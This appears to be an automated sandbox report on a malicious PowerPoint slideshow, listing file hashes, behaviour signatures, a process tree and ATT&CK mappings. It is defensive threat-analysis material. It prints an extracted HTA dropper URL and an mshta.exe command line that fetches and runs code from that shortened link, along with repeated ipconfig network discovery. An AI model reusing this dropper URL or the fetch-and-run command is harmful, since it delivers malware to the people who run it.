Analysis

  • max time kernel
    88s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:54

General

  • Target

    a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps

  • Size

    65KB

  • MD5

    b3955e1cda42b669f89dd5f2ece4534e

  • SHA1

    3e369400e83d66ebc6e704c6e2b7892f5907473f

  • SHA256

    a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151

  • SHA512

    9b82c26b9dd9d1f617a38922cfa058ee40d491b4b46fefd60238934e576859a54ae3ca534763649b25b1caea76c69f2800a21a3ade75420acff87608763d97ad

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://%20%20@j.mp/asdasjASDASDxaksxm

Signatures

  • Process spawned unexpected child process 17 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Gathers network information 2 TTPs 16 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:976
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1960
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1808
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1304
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1372
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:340
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1072
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1736
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1716
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1376
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1824
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1644
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:856
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1668
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" http:\\%20%20@j.mp\asdasjASDASDxaksxm
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:1328
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1552
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:860
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        2⤵
        • Process spawned unexpected child process
        • Gathers network information
        PID:1856

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Command-Line Interface

    1
    T1059

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/340-65-0x0000000000000000-mapping.dmp
    • memory/856-72-0x0000000000000000-mapping.dmp
    • memory/860-89-0x0000000000000000-mapping.dmp
    • memory/976-59-0x000007FEFBA61000-0x000007FEFBA63000-memory.dmp
      Filesize

      8KB

    • memory/976-57-0x0000000000000000-mapping.dmp
    • memory/1072-66-0x0000000000000000-mapping.dmp
    • memory/1304-63-0x0000000000000000-mapping.dmp
    • memory/1328-87-0x0000000000000000-mapping.dmp
    • memory/1372-64-0x0000000000000000-mapping.dmp
    • memory/1376-69-0x0000000000000000-mapping.dmp
    • memory/1552-88-0x0000000000000000-mapping.dmp
    • memory/1644-71-0x0000000000000000-mapping.dmp
    • memory/1668-73-0x0000000000000000-mapping.dmp
    • memory/1716-68-0x0000000000000000-mapping.dmp
    • memory/1736-67-0x0000000000000000-mapping.dmp
    • memory/1756-60-0x0000000075E51000-0x0000000075E53000-memory.dmp
      Filesize

      8KB

    • memory/1756-54-0x0000000074221000-0x0000000074225000-memory.dmp
      Filesize

      16KB

    • memory/1756-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1756-58-0x000000007223D000-0x0000000072248000-memory.dmp
      Filesize

      44KB

    • memory/1756-55-0x0000000071251000-0x0000000071253000-memory.dmp
      Filesize

      8KB

    • memory/1808-62-0x0000000000000000-mapping.dmp
    • memory/1824-70-0x0000000000000000-mapping.dmp
    • memory/1856-90-0x0000000000000000-mapping.dmp
    • memory/1960-61-0x0000000000000000-mapping.dmp